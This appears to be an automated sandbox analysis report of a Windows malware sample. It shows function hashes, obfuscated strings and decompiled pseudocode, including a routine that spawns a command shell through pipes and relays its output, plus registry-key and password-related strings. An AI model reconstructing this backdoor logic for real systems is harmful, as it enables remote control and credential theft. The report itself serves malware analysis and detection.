                                                          Similarity
                                                          • API ID:
                                                          • String ID: $../nettle-3.5.1/ctr16.c$c$length - i < CTR_BUFFER_LIMIT$length < 16
                                                          • API String ID: 0-535899598
                                                          • Opcode ID: 8a585c7f6f4847e6cdab404632b1628f0989679c9260e782601c46f9716b7191
                                                          • Instruction ID: 595662ab794f8c563696035dacf2dbdab12226766188b8df76e1304a900497cc
                                                          • Opcode Fuzzy Hash: 8a585c7f6f4847e6cdab404632b1628f0989679c9260e782601c46f9716b7191
                                                          • Instruction Fuzzy Hash: 1E71DDB5A083199FDB00EF69D48859EBBE0EF88354F01C92EF89997351C3389854CF96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040C2DB, Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %6\.sQ0sid\CYYWQR56.fli$<RCld>$<s0W5WYWi>$<sC66gW0S>$APPDATA
                                                          • API String ID: 0-1218082621
                                                          • Opcode ID: 6161f5786dfb79b59c73abb99621c92b81d561b40ce734a98eccfb102c6c407c
                                                          • Instruction ID: 6048a10f2db6f6121dbf09b1e91f7eeb88fe885a8aaa66a3f769cde923567c5e
                                                          • Opcode Fuzzy Hash: 6161f5786dfb79b59c73abb99621c92b81d561b40ce734a98eccfb102c6c407c
                                                          • Instruction Fuzzy Hash: EC41D8B0408311DAD310AF25D58526EBAF4BF84758F50CA2FE4D897381D77C8585DB5B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004135F2, Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $DiiWYC5dDRSXR454Ci4kdM4S$PIdYwqWwdRFdlVd06I4s$_0ddM4S$advapi32.dll
                                                          • API String ID: 0-1236196231
                                                          • Opcode ID: b21b00564509af26482fc33a2a05aa196c1ef1e3ba354a497be2837f40ba64fc
                                                          • Instruction ID: 116aa698c271bca6352efc5b2b04a0db36bd32a1f1fa5c071599b3e3fb9e0c6d
                                                          • Opcode Fuzzy Hash: b21b00564509af26482fc33a2a05aa196c1ef1e3ba354a497be2837f40ba64fc
                                                          • Instruction Fuzzy Hash: FC31D7B0509351ABD740AF65D59831FBAE0AF84348F41982EF5C49B381D7BDC5848B87
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00410FC4, Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 61%
                                                          			E00410FC4(void* __ecx, signed int _a4, signed int _a8, signed int _a12, void* _a16, intOrPtr _a32) {
				signed int _v0;
				signed int _v24;
				intOrPtr _v32;
				signed int _v44;
				char _v544;
				char _v548;
				char _v556;
				char _v568;
				char _v572;
				signed int _v576;
				void* _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				char* _v632;
				char _v636;
				char _v640;
				intOrPtr _v644;
				signed int _v648;
				signed int* _v652;
				signed int _v656;
				signed int _v660;
				intOrPtr _v664;
				signed int _v668;
				intOrPtr _v692;
				signed int _t122;
				signed int _t129;
				signed int _t133;
				signed int _t134;
				void* _t136;
				void* _t137;

				_t137 = _t136 - 0x24c;
				_t134 = _a8;
				_t133 = _a12;
				_t122 = _a32 - 1;
				if(_t122 > 5) {
					L28:
					_t129 = 0;
					L29:
					return _t129;
				}
				switch( *((intOrPtr*)(_t122 * 4 +  &M0042444C))) {
					case 0:
						_v580 = 0;
						_v584 = 0xf003f;
						_v588 = 0;
						_v592 = 0;
						_v572 =  &_v548;
						_t125 =  &_v556;
						_v596 = 0;
						_v600 = _t133;
						_v604 = _t134;
						_v576 = _t125;
						L0041F454();
						_t137 = _t137 - 0x24;
						if(_t125 != 0) {
							goto L28;
						}
						_v620 = _t133;
						_v624 = _t134;
						_v628 = 1;
						goto L7;
					case 1:
						__eax =  &_v556;
						_v592 = 0x2001f;
						_v596 = 0;
						_v600 = __edi;
						_v604 = __esi;
						_v588 = __eax;
						L0041F42C();
						__esp = __esp - 0x14;
						if(__eax != 0) {
							goto L28;
						}
						__eax = _a8;
						_v616 = 0;
						_v620 = __ebp;
						_v604 = _a8;
						__eax = _a4;
						_v608 = _a4;
						__eax = _v0;
						_v612 = _v0;
						__eax = _v576;
						_v624 = __eax;
						L0041F41C();
						__esp = __esp - 0x18;
						__ebx = __eax;
						__eax = _v600;
						_v648 = __eax;
						L0041F45C();
						_push(__eax);
						if(__ebx != 0) {
							goto L28;
						}
						_v632 = __edi;
						_v636 = __esi;
						_v640 = 2;
						L7:
						_t130 =  &_v580;
						_v632 = "%c%.8x%s";
						_v636 = 0x204;
						_v640 =  &_v580;
						_t126 = E004127A8();
						goto L14;
					case 2:
						__eax = E0041086B(__ecx, __esi, __edi, __ebp);
						__bl = __al;
						if(__al == 0) {
							goto L28;
						}
						_v588 = __esi;
						__esi =  &_v544;
						_v580 = __ebp;
						_v584 = __edi;
						__eax = E004127A8( &_v544, 0x204, "%c%.8x%s%s", 3);
						if(__eax == 0) {
							goto L16;
						}
						goto L27;
					case 3:
						__eax =  &_v556;
						_v592 = 0x2001f;
						_v596 = 0;
						_v600 = __edi;
						_v604 = __esi;
						_v588 = __eax;
						L0041F42C();
						__esp = __esp - 0x14;
						if(__eax != 0) {
							goto L28;
						}
						__eax = _v576;
						_v620 = __ebp;
						_v624 = __eax;
						L0041F444();
						__ebx = __eax;
						_push(__ecx);
						_push(__ecx);
						__eax = _v584;
						_v632 = __eax;
						L0041F45C();
						_push(__eax);
						if(__ebx != 0) {
							goto L28;
						}
						__ebx =  &_v576;
						_v612 = __ebp;
						_v616 = __edi;
						_v620 = __esi;
						__eax = E004127A8( &_v576, 0x204, "%c%.8x%s\\%s", 4);
						L14:
						if(_t126 != 0) {
							_v628 = _t126;
							E00405D7D(_t132, _v32, 0xe8, _t130);
						}
						L16:
						_t129 = 1;
						goto L29;
					case 4:
						goto L28;
					case 5:
						__eax =  &_v556;
						_v592 = 0x2001f;
						_v596 = 0;
						_v600 = __edi;
						_v604 = __esi;
						_v588 = __eax;
						L0041F42C();
						__esp = __esp - 0x14;
						if(__eax != 0) {
							goto L28;
						}
						__eax =  &_v572;
						_v608 = 0;
						_v616 = 0;
						_v620 = __ebp;
						__ebx = 0;
						_v604 =  &_v572;
						__eax =  &_v568;
						_v612 =  &_v568;
						__eax = _v576;
						_v624 = __eax;
						L0041F424();
						__esp = __esp - 0x18;
						if(__eax != 0) {
							L25:
							__eax = _v600;
							_v648 = __eax;
							L0041F45C();
							_push(__eax);
							if(__bl == 0) {
								goto L29;
							}
							__eax = _v24;
							_v636 = __esi;
							__esi =  &_v592;
							_v624 = __ebp;
							_v632 = __edi;
							_v640 = 6;
							_v644 = 0x42443c;
							_v628 = _v24;
							_v648 = 0x204;
							_v652 =  &_v592;
							__eax = E004127A8();
							if(__eax == 0) {
								goto L29;
							}
							L27:
							_v592 = __eax;
							_a4 = E00405D7D(__edx, _a4, 0xe8, __esi);
							goto L29;
						}
						__eax = _v596;
						_v648 = __eax;
						L0041F714();
						_v588 = __eax;
						if(__eax == 0) {
							goto L25;
						}
						_v632 = __eax;
						__eax =  &_v592;
						__edx =  &_v596;
						_v640 = 0;
						_v644 = __ebp;
						_v636 =  &_v592;
						__eax = _v600;
						_v628 = __edx;
						_v648 = __eax;
						L0041F424();
						__esp = __esp - 0x18;
						if(__eax == 0) {
							__eax = _v620;
							_v664 = 0;
							_v652 = _v620;
							__eax = _v612;
							_v656 = _v612;
							__eax = _v616;
							_v660 = _v616;
							__eax = _v44;
							_v668 = _v44;
							__eax = _v624;
							 *__esp = __eax;
							L0041F41C();
							__esp = __esp - 0x18;
							if(__eax != 0) {
								goto L21;
							}
							__eax = _v648;
							_v692 = __ebp;
							 *__esp = __eax;
							L0041F444();
							_push(__edx);
							_push(__edx);
							__ebx = 0 | __eax == 0x00000000;
							L24:
							 &_v636 = E00407F59( &_v636);
							goto L25;
						}
						L21:
						__ebx = 0;
						goto L24;
				}
			}











































                                                          0x00410fc8
                                                          0x00410fd5
                                                          0x00410fdc
                                                          0x00410fea
                                                          0x00410fee
                                                          0x004113a8
                                                          0x004113a8
                                                          0x004113aa
                                                          0x004113b6
                                                          0x004113b6
                                                          0x00410ff4
                                                          0x00000000
                                                          0x00410fff
                                                          0x00411007
                                                          0x0041100f
                                                          0x00411017
                                                          0x0041101f
                                                          0x00411023
                                                          0x00411027
                                                          0x0041102f
                                                          0x00411033
                                                          0x00411036
                                                          0x0041103a
                                                          0x0041103f
                                                          0x00411044
                                                          0x00000000
                                                          0x00000000
                                                          0x0041104a
                                                          0x0041104e
                                                          0x00411052
                                                          0x00000000
                                                          0x00000000
                                                          0x0041105f
                                                          0x00411063
                                                          0x0041106b
                                                          0x00411073
                                                          0x00411077
                                                          0x0041107a
                                                          0x0041107e
                                                          0x00411083
                                                          0x00411088
                                                          0x00000000
                                                          0x00000000
                                                          0x0041108e
                                                          0x00411095
                                                          0x0041109d
                                                          0x004110a1
                                                          0x004110a5
                                                          0x004110ac
                                                          0x004110b0
                                                          0x004110b7
                                                          0x004110bb
                                                          0x004110bf
                                                          0x004110c2
                                                          0x004110c7
                                                          0x004110ca
                                                          0x004110cc
                                                          0x004110d0
                                                          0x004110d3
                                                          0x004110da
                                                          0x004110db
                                                          0x00000000
                                                          0x00000000
                                                          0x004110e1
                                                          0x004110e5
                                                          0x004110e9
                                                          0x004110f1
                                                          0x004110f1
                                                          0x004110f5
                                                          0x004110fd
                                                          0x00411105
                                                          0x00411108
                                                          0x00000000
                                                          0x00000000
                                                          0x0041111d
                                                          0x00411124
                                                          0x00411126
                                                          0x00000000
                                                          0x00000000
                                                          0x0041112c
                                                          0x00411130
                                                          0x00411134
                                                          0x00411138
                                                          0x00411157
                                                          0x0041115e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00411169
                                                          0x0041116d
                                                          0x00411175
                                                          0x0041117d
                                                          0x00411181
                                                          0x00411184
                                                          0x00411188
                                                          0x0041118d
                                                          0x00411192
                                                          0x00000000
                                                          0x00000000
                                                          0x00411198
                                                          0x0041119c
                                                          0x004111a0
                                                          0x004111a3
                                                          0x004111a8
                                                          0x004111aa
                                                          0x004111ab
                                                          0x004111ac
                                                          0x004111b0
                                                          0x004111b3
                                                          0x004111ba
                                                          0x004111bb
                                                          0x00000000
                                                          0x00000000
                                                          0x004111c1
                                                          0x004111c5
                                                          0x004111c9
                                                          0x004111cd
                                                          0x004111ec
                                                          0x004111f1
                                                          0x004111f3
                                                          0x004111f5
                                                          0x0041120f
                                                          0x0041120f
                                                          0x00411214
                                                          0x00411214
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0041121b
                                                          0x0041121f
                                                          0x00411227
                                                          0x0041122f
                                                          0x00411233
                                                          0x00411236
                                                          0x0041123a
                                                          0x0041123f
                                                          0x00411244
                                                          0x00000000
                                                          0x00000000
                                                          0x0041124a
                                                          0x0041124e
                                                          0x00411256
                                                          0x0041125e
                                                          0x00411262
                                                          0x00411264
                                                          0x00411268
                                                          0x0041126c
                                                          0x00411270
                                                          0x00411274
                                                          0x00411277
                                                          0x0041127c
                                                          0x00411281
                                                          0x00411337
                                                          0x00411337
                                                          0x0041133b
                                                          0x0041133e
                                                          0x00411345
                                                          0x00411346
                                                          0x00000000
                                                          0x00000000
                                                          0x00411348
                                                          0x0041134f
                                                          0x00411353
                                                          0x00411357
                                                          0x0041135b
                                                          0x0041135f
                                                          0x00411367
                                                          0x0041136f
                                                          0x00411373
                                                          0x0041137b
                                                          0x0041137e
                                                          0x00411385
                                                          0x00000000
                                                          0x00000000
                                                          0x00411387
                                                          0x00411387
                                                          0x004113a1
                                                          0x00000000
                                                          0x004113a1
                                                          0x00411287
                                                          0x0041128b
                                                          0x0041128e
                                                          0x00411295
                                                          0x00411299
                                                          0x00000000
                                                          0x00000000
                                                          0x0041129f
                                                          0x004112a3
                                                          0x004112a7
                                                          0x004112ab
                                                          0x004112b3
                                                          0x004112b7
                                                          0x004112bb
                                                          0x004112bf
                                                          0x004112c3
                                                          0x004112c6
                                                          0x004112cb
                                                          0x004112d0
                                                          0x004112d6
                                                          0x004112da
                                                          0x004112e2
                                                          0x004112e6
                                                          0x004112ea
                                                          0x004112ee
                                                          0x004112f2
                                                          0x004112f6
                                                          0x004112fd
                                                          0x00411301
                                                          0x00411305
                                                          0x00411308
                                                          0x0041130d
                                                          0x00411312
                                                          0x00000000
                                                          0x00000000
                                                          0x00411314
                                                          0x00411318
                                                          0x0041131c
                                                          0x0041131f
                                                          0x00411326
                                                          0x00411327
                                                          0x00411328
                                                          0x0041132b
                                                          0x00411332
                                                          0x00000000
                                                          0x00411332
                                                          0x004112d2
                                                          0x004112d2
                                                          0x00000000
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %c%.8x%s$%c%.8x%s%s$%c%.8x%s\%s$?
                                                          • API String ID: 0-1127014073
                                                          • Opcode ID: f1ef6a393e88643d805cb06b121d17f0be80af9c4145ae47d983f0f57c2ce8e1
                                                          • Instruction ID: 5e49c9d9379b1dd87b15daa38270e0e0a3fc6f91244b4719e2a77dc22190009b
                                                          • Opcode Fuzzy Hash: f1ef6a393e88643d805cb06b121d17f0be80af9c4145ae47d983f0f57c2ce8e1
                                                          • Instruction Fuzzy Hash: DAB1CFB0909345AFD700EF69D18469FFBE4BF84744F40892EF99887311D7B8D5898B46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004113B8, Relevance: 5.2, Strings: 4, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 63%
                                                          			E004113B8(void* __eax, void* __ecx, char* __edx, void* __eflags, char** _a4) {
				char _v544;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				short _v600;
				intOrPtr _v604;
				char _v612;
				char _v628;
				char* _v632;
				char* _v636;
				char _v640;
				char _v656;
				char _v660;
				char _v668;
				intOrPtr _v672;
				char* _v688;
				intOrPtr _v692;
				char* _v720;
				intOrPtr _v724;
				char* _v728;
				char* _v732;
				char* _v736;
				char* _v740;
				char* _v744;
				char* _v748;
				char* _v752;
				char* _v756;
				char* _v760;
				char* _v764;
				char* _v768;
				char _v772;
				intOrPtr _v776;
				char* _v796;
				intOrPtr _v800;
				char* _v804;
				char* _v808;
				char* _v812;
				char* _v824;
				intOrPtr _v828;
				char* _v832;
				char* _v836;
				char* _v844;
				char* _v848;
				intOrPtr _v852;
				char* _v856;
				void* _t85;
				char* _t92;
				char* _t93;
				intOrPtr _t94;
				intOrPtr _t95;
				char* _t100;
				char* _t102;
				void* _t106;
				char* _t110;
				char** _t118;
				void* _t119;
				char* _t120;
				char* _t121;
				char* _t122;
				char* _t123;
				char* _t125;
				char* _t126;
				char* _t127;
				char** _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				char** _t132;

				_t120 = __edx;
				_t119 = __ecx;
				_t125 =  &_v544;
				_v732 = "ComSpec";
				_t118 = _a4;
				L0041F724();
				E004127A8(_t125, 0x204, "%s", __eax);
				_t85 = E00406F1A(_t120, _t125);
				if(_t85 == 0) {
					_v732 = "WINDIR";
					L0041F724();
					E004127A8(_t125, 0x204, E004081AA("%6\\6Z65dlNh\\YlS.dfd"), _t85);
				}
				if(E00406F1A(_t120, _t125) == 0) {
					L6:
					_v720 = 0;
					L7:
					return E00405D7D(_t120,  *_t118, 0xb9, 0);
				}
				_t122 =  &_v612;
				_t127 =  &_v628;
				_v724 = 0x44;
				_v728 = 0;
				_v636 = 0;
				_v732 = _t122;
				_v632 = 1;
				E004129E4();
				E004129E4(_t127, 0, 0x10);
				_t121 =  &_v640;
				_v720 = 0;
				_v728 =  &_v656;
				_t92 =  &_v660;
				_v724 = _t121;
				_v672 = _t121;
				_v732 = _t92;
				L0041F674();
				_t130 = _t129 - 0x10;
				_t120 = _v688;
				_v736 = 0;
				if(_t92 == 0) {
					goto L7;
				}
				_t93 =  &_v668;
				_v740 = _t120;
				_v744 = 0x42b5d4;
				_v748 = _t93;
				L0041F674();
				_t131 = _t130 - 0x10;
				if(_t93 == 0) {
					goto L6;
				}
				_v764 = _t122;
				L0041F59C();
				_push(_t93);
				_t94 = _v692;
				_v732 = _t127;
				_v736 = _t122;
				_v584 = _t94;
				_v588 = _t94;
				_t95 = _v688;
				_v740 = 0;
				_v744 = 0;
				_v748 = 0;
				_v752 = 1;
				_v756 = 0;
				_v760 = 0;
				_v764 = _t125;
				_v768 = 0;
				_v592 = _t95;
				_v604 = 0x101;
				_v600 = 0;
				L0041F66C();
				_t132 = _t131 - 0x28;
				if(_t95 == 0) {
					goto L6;
				}
				_v808 = _v732;
				L0041F694();
				_push(_t122);
				_t123 = 0;
				_v812 = _v732;
				L0041F694();
				_push(_t127);
				_v804 = 0xffffffff;
				_v808 = _t125;
				_t128 =  &_v728;
				_v812 = 0xb6;
				_v732 = 0;
				 *_t132 =  *_t118;
				E00405D7D(_t120);
				while(1) {
					_t100 = _v744;
					_v796 = 0;
					_v800 = _t128;
					_v804 = 0;
					_v808 = 0;
					_v812 = 0;
					 *_t132 = _t100;
					_v728 = 0;
					L0041F534();
					_t132 = _t132 - 0x18;
					if(_t100 == 0) {
						goto L17;
					}
					L10:
					_t126 = _v752;
					if(_t126 != 0 &&  *0x42b5d0 != 0) {
						if(_t123 >= _t126) {
							L15:
							_v824 = 0;
							_v828 = _t128;
							_v832 = _t126;
							_v836 = _v756;
							_t110 = _v768;
							 *_t132 = _t110;
							L0041F51C();
							_t132 = _t132 - 0x14;
							if(_t110 != 0) {
								_v856 = 0xb7;
								_v848 = _v772;
								_v852 = _v776;
								 *_t132 =  *_t118;
								if(E00405D7D(_t120) + 1 != 0) {
									while(1) {
										_t100 = _v744;
										_v796 = 0;
										_v800 = _t128;
										_v804 = 0;
										_v808 = 0;
										_v812 = 0;
										 *_t132 = _t100;
										_v728 = 0;
										L0041F534();
										_t132 = _t132 - 0x18;
										if(_t100 == 0) {
											goto L17;
										}
										goto L10;
									}
								}
								goto L17;
							}
						} else {
							 *_t132 = _t126;
							L0041F714();
							_v756 = _t100;
							if(_t100 != 0) {
								_t123 = _t126;
								goto L15;
							}
						}
					}
					L18:
					if( *0x42b5d0 != 0) {
						 *_t132 = 0x96;
						E00407EF4();
						continue;
					}
					_t102 = _v768;
					 *_t132 = _t102;
					L0041F694();
					_push(_t102);
					_v844 =  *0x42b5d4;
					L0041F694();
					_v844 = 0;
					_v848 = _v744;
					L0041F4E4();
					_v844 = 0;
					_v848 = 0;
					_v852 = 0xb8;
					_v856 =  *_t118;
					_t106 = E00405D7D(_t120, _t119, _t119, _t120);
					if(_v772 != 0) {
						return E00407F59( &_v772);
					}
					return _t106;
					L17:
					 *0x42b5d0 = 0;
					goto L18;
				}
			}







































































                                                          0x004113b8
                                                          0x004113b8
                                                          0x004113c2
                                                          0x004113c9
                                                          0x004113d0
                                                          0x004113d7
                                                          0x004113f3
                                                          0x004113fb
                                                          0x00411402
                                                          0x00411404
                                                          0x0041140b
                                                          0x00411431
                                                          0x00411431
                                                          0x00411440
                                                          0x0041157a
                                                          0x0041157a
                                                          0x00411582
                                                          0x00000000
                                                          0x00411597
                                                          0x00411446
                                                          0x0041144a
                                                          0x0041144e
                                                          0x00411456
                                                          0x0041145e
                                                          0x00411466
                                                          0x00411469
                                                          0x00411471
                                                          0x00411489
                                                          0x00411492
                                                          0x00411496
                                                          0x0041149e
                                                          0x004114a2
                                                          0x004114a6
                                                          0x004114aa
                                                          0x004114ae
                                                          0x004114b1
                                                          0x004114b6
                                                          0x004114bb
                                                          0x004114bf
                                                          0x004114c7
                                                          0x00000000
                                                          0x00000000
                                                          0x004114cd
                                                          0x004114d1
                                                          0x004114d5
                                                          0x004114dd
                                                          0x004114e0
                                                          0x004114e5
                                                          0x004114ea
                                                          0x00000000
                                                          0x00000000
                                                          0x004114f0
                                                          0x004114f3
                                                          0x004114f8
                                                          0x004114f9
                                                          0x004114fd
                                                          0x00411501
                                                          0x00411505
                                                          0x0041150c
                                                          0x00411513
                                                          0x00411517
                                                          0x0041151f
                                                          0x00411527
                                                          0x0041152f
                                                          0x00411537
                                                          0x0041153f
                                                          0x00411547
                                                          0x0041154b
                                                          0x00411552
                                                          0x00411559
                                                          0x00411564
                                                          0x0041156e
                                                          0x00411573
                                                          0x00411578
                                                          0x00000000
                                                          0x00000000
                                                          0x004115a5
                                                          0x004115a8
                                                          0x004115ad
                                                          0x004115b2
                                                          0x004115b4
                                                          0x004115b7
                                                          0x004115bc
                                                          0x004115bd
                                                          0x004115c5
                                                          0x004115c9
                                                          0x004115cd
                                                          0x004115d7
                                                          0x004115df
                                                          0x004115e2
                                                          0x004115e7
                                                          0x004115e7
                                                          0x004115eb
                                                          0x004115f3
                                                          0x004115f7
                                                          0x004115ff
                                                          0x00411607
                                                          0x0041160f
                                                          0x00411612
                                                          0x0041161a
                                                          0x0041161f
                                                          0x00411624
                                                          0x00000000
                                                          0x00000000
                                                          0x00411626
                                                          0x00411626
                                                          0x0041162c
                                                          0x00411639
                                                          0x0041164d
                                                          0x00411651
                                                          0x00411659
                                                          0x0041165d
                                                          0x00411661
                                                          0x00411665
                                                          0x00411669
                                                          0x0041166c
                                                          0x00411671
                                                          0x00411676
                                                          0x0041167c
                                                          0x00411684
                                                          0x0041168c
                                                          0x00411692
                                                          0x0041169b
                                                          0x004115e7
                                                          0x004115e7
                                                          0x004115eb
                                                          0x004115f3
                                                          0x004115f7
                                                          0x004115ff
                                                          0x00411607
                                                          0x0041160f
                                                          0x00411612
                                                          0x0041161a
                                                          0x0041161f
                                                          0x00411624
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00411624
                                                          0x004115e7
                                                          0x00000000
                                                          0x0041169b
                                                          0x0041163b
                                                          0x0041163b
                                                          0x0041163e
                                                          0x00411645
                                                          0x00411649
                                                          0x0041164b
                                                          0x00000000
                                                          0x0041164b
                                                          0x00411649
                                                          0x00411639
                                                          0x004116ab
                                                          0x004116b2
                                                          0x0041171c
                                                          0x00411723
                                                          0x00000000
                                                          0x00411723
                                                          0x004116b4
                                                          0x004116b8
                                                          0x004116bb
                                                          0x004116c0
                                                          0x004116c6
                                                          0x004116c9
                                                          0x004116d3
                                                          0x004116db
                                                          0x004116de
                                                          0x004116e5
                                                          0x004116ed
                                                          0x004116f5
                                                          0x004116ff
                                                          0x00411702
                                                          0x0041170c
                                                          0x00000000
                                                          0x00411715
                                                          0x00411737
                                                          0x004116a1
                                                          0x004116a1
                                                          0x00000000
                                                          0x004116a1

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %6\6Z65dlNh\YlS.dfd$ComSpec$D$WINDIR
                                                          • API String ID: 0-1530679608
                                                          • Opcode ID: b64c2fc2229afcc4d161395c65153967a16c51a25797fb042b57dc32eb4a4a99
                                                          • Instruction ID: c0a2dff8ecfd3ca449ec7184aa16f3f0f3f293b9e2d18e22baf8a99b3bb4e763
                                                          • Opcode Fuzzy Hash: b64c2fc2229afcc4d161395c65153967a16c51a25797fb042b57dc32eb4a4a99
                                                          • Instruction Fuzzy Hash: F4919EB05087419FD710AF65C18875FBBE4AF84748F01892EE5D88B3A1D7B99489CF8A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040A4BC, Relevance: 5.2, Strings: 4, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MdYQ0Nh.Sii$m6CEd5mWnWRMd664WRaC5C$m6C_0ddrd5Q0RcQ88d0$m6CjRQld0C5dmWnWRMd664WR6
                                                          • API String ID: 0-3174184691
                                                          • Opcode ID: cfe50344d1b9a1cf591cc6770518526586da0e046c6cb975facc6d88c40fe8ab
                                                          • Instruction ID: 94c08b94b57df9e53fa0a2455e2e566f66701f19132ff7a1c430a127e0c0603f
                                                          • Opcode Fuzzy Hash: cfe50344d1b9a1cf591cc6770518526586da0e046c6cb975facc6d88c40fe8ab
                                                          • Instruction Fuzzy Hash: 9761DEB44087109FD710AF26C584A6BBBF4BF88704F01892EE8D897391E7799985CF56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00413A85, Relevance: 5.2, Strings: 4, Instructions: 151COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %d:%I64u:%s%s;$%d:%s%s;$%s%s\$%s*
                                                          • API String ID: 0-525976846
                                                          • Opcode ID: 334888fa3b4434e061fa7b69daef3cafc177c312af5b0b50911e5eeb64500dc7
                                                          • Instruction ID: f6b2b9afb8f28ceff06ae1ca88c29ba9ed65548566ee5afaf2077295461a783a
                                                          • Opcode Fuzzy Hash: 334888fa3b4434e061fa7b69daef3cafc177c312af5b0b50911e5eeb64500dc7
                                                          • Instruction Fuzzy Hash: 0971AFB44093459BD320EF6AD18469FBBE0AF84758F008E1EE4D887391D7B89689CF57
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00420700, Relevance: 5.1, Strings: 4, Instructions: 131COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ../nettle-3.5.1/memxor3.c$M$n == 1$n > 0
                                                          • API String ID: 0-17687075
                                                          • Opcode ID: 389ade0749032fac037805b9abc3480a8171c3f13d13cda5c72ac285551c0497
                                                          • Instruction ID: 88b4d72e3a3b074a803e33dc480ae7ecbd49f2114936249b734713bf6416a905
                                                          • Opcode Fuzzy Hash: 389ade0749032fac037805b9abc3480a8171c3f13d13cda5c72ac285551c0497
                                                          • Instruction Fuzzy Hash: 0951BB716083A28FC300CF28E59052BBBF1BFCA310F048A1EE69087645D335EA19CF92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040B34D, Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s\%s$lWk67i45dN.Sii$lWkQ54i6.Sii$lWkniQd.Sii
                                                          • API String ID: 0-1446494701
                                                          • Opcode ID: 11b24af2d9943bdd585289004bbed1b8b93da4e2fff93dd0614d11004ba5693e
                                                          • Instruction ID: 99cae675b6ce9c0e2fecfda939a24821795d6923156f602411de4cd21c6c0224
                                                          • Opcode Fuzzy Hash: 11b24af2d9943bdd585289004bbed1b8b93da4e2fff93dd0614d11004ba5693e
                                                          • Instruction Fuzzy Hash: D1414BB05083459AC710EF25D58426EBBE0EF91348F41982FE4D8AB382D77D9655CB4F
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040A2C3, Relevance: 5.1, Strings: 4, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ $@$Password
                                                          • API String ID: 0-2841454644
